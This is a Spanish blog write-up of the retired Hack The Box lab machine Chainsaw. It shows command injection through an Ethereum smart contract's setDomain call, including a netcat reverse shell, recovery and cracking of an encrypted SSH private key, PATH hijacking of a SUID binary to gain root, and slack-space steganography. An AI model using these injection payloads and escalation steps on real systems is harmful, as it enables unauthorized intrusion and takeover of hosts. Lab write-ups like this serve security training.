<!DOCTYPE html>
<html lang="es"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Maquina Retirada Chainsaw de Hack The Box (Necesario VIP) | Pirrandi Blog</title>
<meta name="generator" content="Jekyll v3.9.3" />
<meta property="og:title" content="Maquina Retirada Chainsaw de Hack The Box (Necesario VIP)" />
<meta name="author" content="Pirrandi" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada CHAINSAW" />
<meta property="og:description" content="En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada CHAINSAW" />
<link rel="canonical" href="http://localhost:4000/2021/12/19/Chainsaw.html" />
<meta property="og:url" content="http://localhost:4000/2021/12/19/Chainsaw.html" />
<meta property="og:site_name" content="Pirrandi Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-12-19T00:00:00-03:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Maquina Retirada Chainsaw de Hack The Box (Necesario VIP)" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Pirrandi"},"dateModified":"2021-12-19T00:00:00-03:00","datePublished":"2021-12-19T00:00:00-03:00","description":"En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada CHAINSAW","headline":"Maquina Retirada Chainsaw de Hack The Box (Necesario VIP)","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2021/12/19/Chainsaw.html"},"url":"http://localhost:4000/2021/12/19/Chainsaw.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" /><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Pirrandi Blog" /></head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">Pirrandi Blog<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        <a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a>
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
  <div class="author-box">
    
    
        <img src="" class="author-avatar" alt="Avatar" />
    
Este es mi blog personal sobre Conceptos Hacking Etico // HTB // TryHackMe // Resumenes de Hacking // Herramientas para distintas tareas.

</div>


<div class="post">
  <h1 class="post-title">Maquina  Retirada Chainsaw de Hack The Box (Necesario VIP)</h1>
  
  <div class="post-tags">
     
      <a class="tag" href="/tag/HTB,/">HTB,</a>
      
      <a class="tag" href="/tag/Crypto,/">Crypto,</a>
      
      <a class="tag" href="/tag/Smart/">Smart</a>
      
      <a class="tag" href="/tag/Contracts,/">Contracts,</a>
      
      <a class="tag" href="/tag/OS/">OS</a>
      
      <a class="tag" href="/tag/Injection,/">Injection,</a>
      
      <a class="tag" href="/tag/IPFS,/">IPFS,</a>
      
      <a class="tag" href="/tag/Path/">Path</a>
      
      <a class="tag" href="/tag/Hijacking,/">Hijacking,</a>
      
      <a class="tag" href="/tag/Python3,/">Python3,</a>
      
      <a class="tag" href="/tag/Web3,/">Web3,</a>
      
      <a class="tag" href="/tag/Ethereum,/">Ethereum,</a>
      
      <a class="tag" href="/tag/Maquinas/">Maquinas</a>
      
      <a class="tag" href="/tag/Retiradas,/">Retiradas,</a>
      
      <a class="tag" href="/tag/Writeup/">Writeup</a>
      
  </div>
  
  <div class="post-date">Published on 19 Dec 2021</div>
  
  <noscript>
    <div class="post-description">En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada CHAINSAW</div>
  </noscript>
  <div id="animated-post-description" class="post-description" style="display: none;"></div>
  
  <h1 id="chainsaw--hack-the-box">Chainsaw ~ Hack The Box</h1>

<p>Realizamos el Primer escaneo con Nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="s2">$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.10.142       "</span>
</code></pre></div></div>
<p>Procedemos con el siguiente escaneo de Nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed <span class="o">(</span>FTP code 230<span class="o">)</span>
| <span class="nt">-rw-r--r--</span>    1 1001     1001        23828 Dec 05  2018 WeaponizedPing.json
| <span class="nt">-rw-r--r--</span>    1 1001     1001          243 Dec 12  2018 WeaponizedPing.sol
|_-rw-r--r--    1 1001     1001           44 Dec 20 15:18 address.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.16.7
|      Logged <span class="k">in </span>as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session <span class="nb">timeout </span><span class="k">in </span>seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.1 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 02:dd:8a:5d:3c:78:d4:41:ff:bb:27:39:c1:a2:4f:eb <span class="o">(</span>RSA<span class="o">)</span>
|   256 3d:71:ff:d7:29:d5:d4:b2:a6:4f:9d:eb:91:1b:70:9f <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 7e:02:da:db:29:f9:d2:04:63:df:fc:91:fd:a2:5a:f2 <span class="o">(</span>ED25519<span class="o">)</span>
9810/tcp open  unknown
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 400 Bad Request
|     Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, User-Agent
|     Access-Control-Allow-Origin: <span class="k">*</span>
|     Access-Control-Allow-Methods: <span class="k">*</span>
|     Content-Type: text/plain
|     Date: Mon, 20 Dec 2021 15:21:11 GMT
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.1 400 Bad Request
|     Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, User-Agent
|     Access-Control-Allow-Origin: <span class="k">*</span>
|     Access-Control-Allow-Methods: <span class="k">*</span>
|     Content-Type: text/plain
|     Date: Mon, 20 Dec 2021 15:21:07 GMT
|     Connection: close
|     Request
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, User-Agent
|     Access-Control-Allow-Origin: <span class="k">*</span>
|     Access-Control-Allow-Methods: <span class="k">*</span>
|     Content-Type: text/plain
|     Date: Mon, 20 Dec 2021 15:21:07 GMT
|_    Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9810-TCP:V<span class="o">=</span>7.91%I<span class="o">=</span>7%D<span class="o">=</span>12/20%Time<span class="o">=</span>61C09F63%P<span class="o">=</span>x86_64-pc-linux-gnu%r<span class="o">(</span>G
SF:etRequest,118,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">Access-Control-All
SF:ow-Headers:</span><span class="se">\x</span><span class="s2">20Origin,</span><span class="se">\x</span><span class="s2">20X-Requested-With,</span><span class="se">\x</span><span class="s2">20Content-Type,</span><span class="se">\x</span><span class="s2">20Accept,
SF:</span><span class="se">\x</span><span class="s2">20User-Agent</span><span class="se">\r\n</span><span class="s2">Access-Control-Allow-Origin:</span><span class="se">\x</span><span class="s2">20</span><span class="se">\*\r\n</span><span class="s2">Access-Control-
SF:Allow-Methods:</span><span class="se">\x</span><span class="s2">20</span><span class="se">\*\r\n</span><span class="s2">Content-Type:</span><span class="se">\x</span><span class="s2">20text/plain</span><span class="se">\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">20Mon,</span><span class="se">\x</span><span class="s2">2
SF:020</span><span class="se">\x</span><span class="s2">20Dec</span><span class="se">\x</span><span class="s2">202021</span><span class="se">\x</span><span class="s2">2015:21:07</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\r\n</span><span class="s2">40
SF:0</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request"</span><span class="o">)</span>%r<span class="o">(</span>HTTPOptions,100,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20200</span><span class="se">\x</span><span class="s2">20OK</span><span class="se">\r\n</span><span class="s2">Acce
SF:ss-Control-Allow-Headers:</span><span class="se">\x</span><span class="s2">20Origin,</span><span class="se">\x</span><span class="s2">20X-Requested-With,</span><span class="se">\x</span><span class="s2">20Content-Ty
SF:pe,</span><span class="se">\x</span><span class="s2">20Accept,</span><span class="se">\x</span><span class="s2">20User-Agent</span><span class="se">\r\n</span><span class="s2">Access-Control-Allow-Origin:</span><span class="se">\x</span><span class="s2">20</span><span class="se">\*\r\n</span><span class="s2">A
SF:ccess-Control-Allow-Methods:</span><span class="se">\x</span><span class="s2">20</span><span class="se">\*\r\n</span><span class="s2">Content-Type:</span><span class="se">\x</span><span class="s2">20text/plain</span><span class="se">\r\n</span><span class="s2">Da
SF:te:</span><span class="se">\x</span><span class="s2">20Mon,</span><span class="se">\x</span><span class="s2">2020</span><span class="se">\x</span><span class="s2">20Dec</span><span class="se">\x</span><span class="s2">202021</span><span class="se">\x</span><span class="s2">2015:21:07</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20c
SF:lose</span><span class="se">\r\n\r\n</span><span class="s2">"</span><span class="o">)</span>%r<span class="o">(</span>FourOhFourRequest,118,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Requ
SF:est</span><span class="se">\r\n</span><span class="s2">Access-Control-Allow-Headers:</span><span class="se">\x</span><span class="s2">20Origin,</span><span class="se">\x</span><span class="s2">20X-Requested-With,</span><span class="se">\x</span><span class="s2">2
SF:0Content-Type,</span><span class="se">\x</span><span class="s2">20Accept,</span><span class="se">\x</span><span class="s2">20User-Agent</span><span class="se">\r\n</span><span class="s2">Access-Control-Allow-Origin:
SF:</span><span class="se">\x</span><span class="s2">20</span><span class="se">\*\r\n</span><span class="s2">Access-Control-Allow-Methods:</span><span class="se">\x</span><span class="s2">20</span><span class="se">\*\r\n</span><span class="s2">Content-Type:</span><span class="se">\x</span><span class="s2">20text/
SF:plain</span><span class="se">\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">20Mon,</span><span class="se">\x</span><span class="s2">2020</span><span class="se">\x</span><span class="s2">20Dec</span><span class="se">\x</span><span class="s2">202021</span><span class="se">\x</span><span class="s2">2015:21:11</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Conne
SF:ction:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\r\n</span><span class="s2">400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request"</span><span class="o">)</span><span class="p">;</span>
Service Info: OSs: Unix, Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</code></pre></div></div>
<p>Procedemos con el Puerto 21 - FTP - User:anonymous pass:
Descargamos los recursos que encontramos a nuestra Maquina</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># ls</span>
address.txt WeaponizedPing.json  WeaponizedPing.sol 
</code></pre></div></div>
<p>Iniciamos una Consola de Python3
Jugamos con las librerias para BlockChain Web3, etherium</p>

<pre><code class="language-python3">&gt;&gt;&gt; from web3 import Web3, eth
&gt;&gt;&gt; import json
&gt;&gt;&gt; address = '0x6B685cC39bD295c640D347BCffFe7eAF0d52726d'
&gt;&gt;&gt; w3 = Web3(Web3.HTTPProvider('http://10.10.10.142:9810'))
&gt;&gt;&gt; w3.eth.accounts
['0x96dcf19159885661763A2dC660C26eD43bA219EA', '0x727e4B4A323C8e44Bb3FD6e6204C71aE5404a9Ab', '0x15277FC14C83B8EcbF116eC9567F661A9B77F6D8', '0x08F388310Bd454784Ee4fD849D53Fefbc9872aAb', '0x2266F706b10C9a048B4548399eBBA518bFb6196f', '0x44cC8A65153a071425F56066f68fc2Ec47b6C862', '0x5D139e0229902005f9b4088108Eef65a05949cb2', '0xEc3845eb26262D2F531e817c121A64A1E9F6D497', '0x276Db76243DC443D2Ae2729D14861B452ED2c79e', '0x5359AFbD63Af1daF0248602DA1aFBA39d31347f8']
&gt;&gt;&gt; w3.eth.defaultAccount = w3.eth.accounts[0]
&gt;&gt;&gt; json_file = json.loads(open("WeaponizedPing.json", "r").read())
&gt;&gt;&gt; json_file['abi']
[{'constant': True, 'inputs': [], 'name': 'getDomain', 'outputs': [{'name': '', 'type': 'string'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'name': '_value', 'type': 'string'}], 'name': 'setDomain', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}]
&gt;&gt;&gt; abi = json_file['abi']
&gt;&gt;&gt; contract = w3.eth.contract(address=address, abi=abi)
&gt;&gt;&gt; conttrac.functions.
conttrac.functions.abi         conttrac.functions.address     conttrac.functions.getDomain(  conttrac.functions.setDomain(  conttrac.functions.web3        
&gt;&gt;&gt; contract.functions.getDomain().call()
'google.com'
&gt;&gt;&gt; contract.functions.setDomain('youtube.com').transact()
HexBytes('0xaf117d49938704c00dd79b9ffdcac17b077bae594ad7a83a507a1bdcbbe5b356')
&gt;&gt;&gt; contract.functions.getDomain().call()
'youtube.com'
&gt;&gt;&gt; contract.functions.setDomain('10.10.14.12; ping -c 3 IP').transact()
HexBytes('0xf6bfe28c9b14a523c3621e893ade5ac89c1bd171c124a03c4baba1ac9e6f79b9')

- RCE -
&gt;&gt;&gt; contract.functions.setDomain('10.10.14.12;nc -e /bin/bash IP 443').transact()
HexBytes('0x732bdc75b92c0e037a61b113fbd62230ef534d93c4d00ac5a39796f1f26439dc')
</code></pre>

<p>Nos ponemos con una session de <code class="language-plaintext highlighter-rouge">nc -vlnp 443</code> a la escucha y recibimos la shell como <code class="language-plaintext highlighter-rouge">Administrator</code></p>

<h1 id="ipfs---user-pivotion">IPFS - User Pivotion</h1>
<p>Encontramos enumerando el directorio de nuestro usuario un directorio llamado <code class="language-plaintext highlighter-rouge">.ipfs</code>
Procedemos de la siguiente manera.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>administrator@chainsaw:/home/administrator<span class="nv">$ </span><span class="k">for </span>i <span class="k">in</span> <span class="si">$(</span>ipfs refs <span class="nb">local</span><span class="si">)</span><span class="p">;</span> <span class="k">do </span>ipfs <span class="nb">ls</span> <span class="nv">$i</span> 2&gt;/dev/null<span class="p">;</span> <span class="k">done
</span>QmXWS8VFBxJPsxhF8KEqN1VpZf52DPhLswcXpxEDzF5DWC 391 arti.key.pub
QmPjsarLFBcY8seiv3rpUZ2aTyauPF3Xu3kQm56iD6mdcq 391 bobby.key.pub
QmUHHbX4N8tUNyXFK9jNfgpFFddGgpn72CF1JyNnZNeVVn 391 bryan.key.pub
QmUH2FceqvTSAvn6oqm8M49TNDqowktkEx4LgpBx746HRS 391 lara.key.pub
QmcMCDdN1qDaa2vaN654nA4Jzr6Zv9yGSBjKPk26iFJJ4M 391 wendy.key.pub
QmZrd1ik8Z2F5iSZPDA2cZSmaZkHFEE4jZ3MiQTDKHAiri 45459 mail-log/
QmbwWcNc7TZBUDFzwW7eUTAyLE2hhwhHiTXqempi1CgUwB 10063 artichain600-protonmail-2018-12-13T20_50_58+01_00.eml
QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF 4640  <span class="s2">"bobby"</span>axelrod600-protonmail-2018-12-13-T20_28_54+01_00.eml    SERA LA ID_RSA ?? Para Bobby??
QmZxzK6gXioAUH9a68ojwkos8EaeANnicBJNA3TND4Sizp 10084 bryanconnerty600-protonmail-2018-12-13T20_50_36+01_00.eml
QmegE6RZe59xf1TyDdhhcNnMrsevsfuJHUynLuRc4yf6V1 10083 laraaxelrod600-protonmail-2018-12-13T20_49_35+01_00.eml
QmXwXzVYKgYZEXU1dgCKeejT87Knw9nydGcuUZrjwNb2Me 10092 wendyrhoades600-protonmail-2018-12-13T20_50_15+01_00.eml
QmZTR5bcpQD7cFgTorqxZDYaew1Wqgfbd2ud9QqGPAkK2V 1688 about
QmYCvbfNbCwFR45HiNP45rwJgvatpiW38D961L5qAhUM5Y 200  contact
QmY5heUM5qgRubMDD1og9fhCPA6QdkMp3QCwd4s7gJsyE7 322  <span class="nb">help
</span>QmejvEPop4D7YUadeGqYWmZxHhLc4JBUCzJJHWMzdcMe2y 12   ping
QmXgqKTbzdh83pQtKFb19SpMCpDDcKR2ujqk3pKph9aCNF 1692 quick-start
QmPZ9gcCEpqKTo6aq61g2nXGUhM4iCL3ewB6LDXZCtioEB 1102 readme
QmQ5vhrL7uv6tuoN9KeVBwd4PwfQkXdVVmDLUZuTNxqgvm 1173 security-notes
QmWMuEvh2tGJ1DiNPPoN6rXme2jMYUixjxsC6QUji8mop8 2996 maintain/
QmXymZCHdTHz5BA5ugv9MQTBtQAb6Vit4iFeEnuRj6Udrh 660  gen.py
QmPctBY8tq2TpPufHuQUbe2sCxoy2wD5YRB6kdce35ZwAx 2237 pub/
QmYn3NxLLYA6xU2XL1QJfCZec4B7MpFNxVVtDvqbiZCFG8 231 chainsaw-emp.csv
</code></pre></div></div>
<p>Nos descargamos el contenido del mail encontramos una cadena en base64 que resulta ser la id_rsa de Bobby</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ipfs get QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF

Decodificamos la ID_RSA en <span class="nb">base64</span> 

<span class="nt">-----BEGIN</span> RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,53D881F299BA8503

SeCNYw/BsXPyQq1HRLEEKhiNIVftZagzOcc64ff1IpJo9IeG7Z/zj+v1dCIdejuk
7ktQFczTlttnrIj6mdBb6rnN6CsP0vbz9NzRByg1o6cSGdrL2EmJN/eSxD4AWLcz
n32FPY0VjlIVrh4rjhRe2wPNogAciCHmZGEB0tgv2/eyxE63VcRzrxJCYl+hvSZ6
fvsSX8A4Qr7rbf9fnz4PImIgurF3VhQmdlEmzDRT4m/pqf3TmGAk9+wriqnkODFQ
I+2I1cPb8JRhLSz3pyB3X/uGOTnYp4aEq+AQZ2vEJz3FfX9SX9k7dd6KaZtSAzqi
w981ES85Dk9NUo8uLxnZAw3sF7Pz4EuJ0Hpo1eZgYtKzvDKrrw8uo4RCadx7KHRT
inKXduHznGA1QROzZW7xE3HEL3vxR9gMV8gJRHDZDMI9xlw99QVwcxPcFa31AzV2
yp3q7yl954SCMOti4RC3Z4yUTjDkHdHQoEcGieFOWU+i1oij4crx1LbO2Lt8nHK6
G1Ccq7iOon4RsTRlVrv8liIGrxnhOY295e9drl7BXPpJrbwso8xxHlT3333YU9dj
hQLNp5+2H4+i6mmU3t2ogToP4skVcoqDlCC+j6hDOl4bpD9t6TIJurWxmpGgNxes
q8NsAentbsD+xl4W6q5muLJQmj/xQrrHacEZDGI8kWvZE1iFmVkD/xBRnwoGZ5ht
DyilLPpl9R+Dh7by3lPm8kf8tQnHsqpRHceyBFFpnq0AUdEKkm1LRMLAPYILblKG
jwrCqRvBKRMIl6tJiD87NM6JBoQydOEcpn+6DU+2Actejbur0aM74IyeenrGKSSZ
IZMsd2kTSGUxy9o/xPKDkUw/SFUySmmwiqiFL6PaDgxWQwHxtxvmHMhL6citNdIw
TcOTSJczmR2pJxkohLrH7YrS2alKsM0FpFwmdz1/XDSF2D7ibf/W1mAxL5UmEqO0
hUIuW1dRFwHjNvaoSk+frAp6ic6IPYSmdo8GYYy8pXvcqwfRpxYlACZu4Fii6hYi
4WphT3ZFYDrw7StgK04kbD7QkPeNq9Ev1In2nVdzFHPIh6z+fmpbgfWgelLHc2et
SJY4+5CEbkAcYEUnPWY9SPOJ7qeU7+b/eqzhKbkpnblmiK1f3reOM2YUKy8aaleh
nJYmkmr3t3qGRzhAETckc8HLE11dGE+l4ba6WBNu15GoEWAszztMuIV1emnt97oM
ImnfontOYdwB6/2oCuyJTif8Vw/WtWqZNbpey9704a9map/+bDqeQQ41+B8ACDbK
WovsgyWi/UpiMT6m6rX+FP5D5E8zrYtnnmqIo7vxHqtBWUxjahCdnBrkYFzl6KWR
gFzx3eTatlZWyr4ksvFmtobYkZVAQPABWz+gHpuKlrqhC9ANzr/Jn+5ZfG02moF/
edL1bp9HPRI47DyvLwzT1/5L9Zz6Y+1MzendTi3KrzQ/Ycfr5YARvYyMLbLjMEtP
UvJiY40u2nmVb6Qqpiy2zr/aMlhpupZPk/xt8oKhKC+l9mgOTsAXYjCbTmLXzVrX
15U210BdxEFUDcixNiwTpoBS6MfxCOZwN/1Zv0mE8ECI+44LcqVt3w<span class="o">==</span>
<span class="nt">-----END</span> RSA PRIVATE KEY----- 
</code></pre></div></div>

<p>Parece encriptada, procedemos con ssh2john a obtener un hash y crackearlo
<code class="language-plaintext highlighter-rouge">jackychain</code></p>

<p>Nos conectamos con la id_rsa como Bobby por SSH.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bobby@chainsaw:/opt<span class="nv">$ </span>find / <span class="nt">-perm</span> <span class="nt">-4000</span> 2&gt;/dev/null
/home/bobby/projects/ChainsawClub/ChainsawClub
</code></pre></div></div>

<p>Procedemos a hacer el comando <code class="language-plaintext highlighter-rouge">strings al binario SUID ChainsawClub</code> encontramos que <code class="language-plaintext highlighter-rouge">se esta llamando de forma relativa al comando sudo</code>
Podemos efectuar PATH HIJACKING</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cd</span> /tmp
nano <span class="s2">"sudo"</span> <span class="nt">--</span><span class="o">&gt;</span> 
<span class="nt">------------------</span>
<span class="c">#!/bin/bash </span>
<span class="s2">"chmod u+s /bin/bash"</span>
<span class="nt">-------------------</span>
</code></pre></div></div>

<p>Procedemos a darle permisos de ejecucion</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">chmod</span> <span class="s2">"+x sudo"</span> 
</code></pre></div></div>

<p>Cambiamos el PATH para que pille nuestro <code class="language-plaintext highlighter-rouge">archivo hijaker en bash llamado SUDO</code> almacenado en la <code class="language-plaintext highlighter-rouge">ruta /tmp</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bobby@chainsaw:/tmp$export PATH="/tmp":$PATH
</code></pre></div></div>

<p>Nos movemos al Binario SUID y lo ejecutamos</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bobby@chainsaw:/tmp<span class="nv">$ </span><span class="nb">cd</span> /home/bobby/projects/ChainsawClub/
bobby@chainsaw:~/projects/ChainsawClub<span class="s2">$" ./ChainsawClub "</span>
</code></pre></div></div>

<p>Comprobando si la Bash es SUID</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bobby@chainsaw:~/projects/ChainsawClub<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span> /bin/bash
<span class="nt">-rw</span><span class="s2">"s"</span>r-xr-x 1 root root 1121696 Sep 12  2018 /bin/bash
</code></pre></div></div>

<p>Nos Migramos la consola al usuario ROOT con un <code class="language-plaintext highlighter-rouge">bash -p</code></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bobby@chainsaw:~/projects/ChainsawClub<span class="nv">$ </span>bash <span class="nt">-p</span>
bash-4.4# <span class="nb">cd</span> /root
bash-4.4# <span class="nb">ls
</span>ChainsawClub  root.txt  snap
</code></pre></div></div>

<p>Sacamos la Flag para Root</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-4.4# <span class="nb">cat </span>root.txt 
Mine deeper to get rewarded with root coin <span class="o">(</span>RTC<span class="o">)</span>...
</code></pre></div></div>

<h1 id="steganografia---bmap---guardando-datos-en-el-slack-space-de-archivos">Steganografia - Bmap - Guardando Datos en el Slack SPace de archivos</h1>

<p>Consiste en almacenar los datos en la porcion de espacio vacio, o reservado que se alberga para los archivos</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-4.4# <span class="s2">"bmap --mode slack"</span> root.txt 
getting from block 2655304
file size was: 52
<span class="s2">"slack"</span> size: 4044
block size: 4096
xxxxxxxxxx7deca1b9dd386cd4c395b06e3
</code></pre></div></div>
<p>Normalmente cuando escribimos en archivos, los datos se almacenan en la porcion llamada <code class="language-plaintext highlighter-rouge">block size</code> y a medida que almacenamos data se van consimiendo los recursos del slack space para ir sumandose al block space. Por eso con esta tecnica se consigue almacenar datos en archivos y que tengan otra posible data escondida y no varie el peso del archivo en la block space.</p>

<p>Box Guapisima Hacked - K0H4ck</p>

</div>


<div class="comments">
<div id="disqus_thread"></div>
<script>
 var disqus_config = function () {
     this.page.url = 'http://localhost:4000/2021/12/19/Chainsaw.html';
     this.page.identifier = '/2021/12/19/Chainsaw';
     this.page.title = 'Maquina  Retirada Chainsaw de Hack The Box (Necesario VIP)';
 };

 (function() {  // REQUIRED CONFIGURATION VARIABLE: EDIT THE SHORTNAME BELOW
     var d = document, s = d.createElement('script');

     s.src = '//bitbrain-github-io.disqus.com/embed.js';

     s.setAttribute('data-timestamp', +new Date());
     (d.head || d.body).appendChild(s);
 })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>

</div>




<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/2022/06/27/Trick.html">
            Maquina  Retirada Trick de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/15/Attacktive-Directory.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/05/Search-AD.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
  </ul>
</div>




  
  <h2>all tags</h2>
  <div class="tag-cloud"><a href="/tag/%26/" class="set-1">&</a> <a href="/tag/%2C/" class="set-1">,</a> <a href="/tag/1.8%2C/" class="set-1">1.8,</a> <a href="/tag/4.4%2C/" class="set-1">4.4,</a> <a href="/tag/8.6%2C/" class="set-1">8.6,</a> <a href="/tag/ad/" class="set-1">AD</a> <a href="/tag/adrotate%2C/" class="set-1">ADRotate,</a> <a href="/tag/aspreproast/" class="set-1">ASPREPRoast</a> <a href="/tag/asrep-roast%2C/" class="set-1">ASREP-Roast,</a> <a href="/tag/asreproast/" class="set-1">ASREPRoast</a> <a href="/tag/active/" class="set-1">Active</a> <a href="/tag/admin%2C/" class="set-1">Admin,</a> <a href="/tag/admins/" class="set-1">Admins</a> <a href="/tag/admins%2C/" class="set-1">Admins,</a> <a href="/tag/archivos/" class="set-1">Archivos</a> <a href="/tag/attack%2C/" class="set-1">Attack,</a> <a href="/tag/attacks/" class="set-1">Attacks</a> <a href="/tag/autopwn%2C/" class="set-1">AutoPwn,</a> <a href="/tag/azure/" class="set-1">Azure</a> <a href="/tag/bof%2C/" class="set-1">BOF,</a> <a href="/tag/bin/" class="set-1">Bin</a> <a href="/tag/blind%2C/" class="set-1">Blind,</a> <a href="/tag/bloodhound%2C/" class="set-1">BloodHound,</a> <a href="/tag/bruta%2C/" class="set-1">Bruta,</a> <a href="/tag/bruteforce%2C/" class="set-1">BruteForce,</a> <a href="/tag/bruteforce%2C/" class="set-1">Bruteforce,</a> <a href="/tag/burpsuite%2C/" class="set-1">Burpsuite,</a> <a href="/tag/bypass/" class="set-1">ByPass</a> <a href="/tag/bypass%2C/" class="set-1">Bypass,</a> <a href="/tag/ca/" class="set-1">CA</a> <a href="/tag/cgi-bin%2C/" class="set-1">CGI-BIN,</a> <a href="/tag/cron%2C/" class="set-1">CRON,</a> <a href="/tag/csrf/" class="set-1">CSRF</a> <a href="/tag/curl%2C/" class="set-1">CURL,</a> <a href="/tag/chkrootkit%2C/" class="set-1">Chkrootkit,</a> <a href="/tag/churrasco%2C/" class="set-1">Churrasco,</a> <a href="/tag/cifrado/" class="set-1">Cifrado</a> <a href="/tag/command/" class="set-1">Command</a> <a href="/tag/contracts%2C/" class="set-1">Contracts,</a> <a href="/tag/cracking/" class="set-1">Cracking</a> <a href="/tag/crackmapexec%2C/" class="set-1">Crackmapexec,</a> <a href="/tag/cron-taks%2C/" class="set-1">Cron-taks,</a> <a href="/tag/crontabs%2C/" class="set-1">CronTabs,</a> <a href="/tag/crypto%2C/" class="set-1">Crypto,</a> <a href="/tag/curlftp%2C/" class="set-1">CurlFtp,</a> <a href="/tag/decimal%2C/" class="set-1">Decimal,</a> <a href="/tag/device/" class="set-1">Device</a> <a href="/tag/directory%2C/" 